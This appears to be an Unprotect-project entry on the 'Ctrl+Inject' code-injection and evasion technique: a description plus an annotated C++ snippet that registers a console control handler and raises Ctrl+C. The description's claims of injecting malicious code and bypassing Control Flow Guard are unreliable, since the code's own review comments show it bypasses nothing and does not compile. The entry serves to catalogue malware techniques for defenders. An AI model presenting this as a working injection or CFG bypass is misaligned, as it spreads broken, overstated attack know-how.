Windows C++ / Ctrl+Inject by Unprotect
Created on Thursday 29 December 2022. Updated 6 months, 1 week ago.
Description:
This code first defines a callback function called ControlSignalHandler that will be used to inject malicious code. It then bypasses pointer encoding and control flow guard to ensure that the function can be called. Finally, it sets the callback function for control signal handlers using the SetConsoleCtrlHandler function and triggers a control signal by calling GenerateConsoleCtrlEvent.
Code
#include <Windows.h>
#include <cstdio>
// callback function for control signal handlers
BOOL WINAPI ControlSignalHandler(DWORD dwCtrlType)
{
    // HandlerRoutine registered with SetConsoleCtrlHandler in main. The console
    // subsystem invokes it on a thread of its own when a control event (Ctrl+C,
    // Ctrl+Break, close, ...) is delivered; the event type is not inspected here.
    // Returning TRUE reports the event as handled, so neither further handlers
    // nor the default action for the event run.
    (void)dwCtrlType;
    return TRUE;
}
int main()
{
// Entry point: registers ControlSignalHandler as a console control handler for
// this process and then raises a Ctrl+C event so that the handler is invoked.
// bypass pointer encoding
// NOTE(review): EncodePointer immediately followed by DecodePointer on the same
// value is a round trip, so decodedPointer is again the address of
// ControlSignalHandler. Within one process these two lines neither hide nor
// bypass anything; they only exercise the API pair used to store encoded
// function pointers.
void* encodedPointer = EncodePointer((PVOID)ControlSignalHandler);
void* decodedPointer = DecodePointer(encodedPointer);
// bypass control flow guard
// NOTE(review): this call does not match the documented arity of
// SetProcessValidCallTargets (and passes an integer where a pointer is
// expected), and its BOOL result is not checked, so the snippet is illustrative
// rather than compilable as written. A function whose address is taken in the
// same module is presumably already a valid CFG target, so for a local handler
// this step would be a no-op -- confirm.
SetProcessValidCallTargets(GetCurrentProcess(), (UINT_PTR)decodedPointer, sizeof(void*));
// set callback function for control signal handlers
// The BOOL result (FALSE on failure) is not checked.
SetConsoleCtrlHandler((PHANDLER_ROUTINE)decodedPointer, TRUE);
// trigger control signal (Ctrl+C)
// NOTE(review): process-group id 0 delivers the event to every process attached
// to this console, not only the current one. The handler runs on a separate
// thread, and nothing here waits for it, so main may return (ending the process)
// before ControlSignalHandler has executed.
GenerateConsoleCtrlEvent(CTRL_C_EVENT, 0);
return 0;
}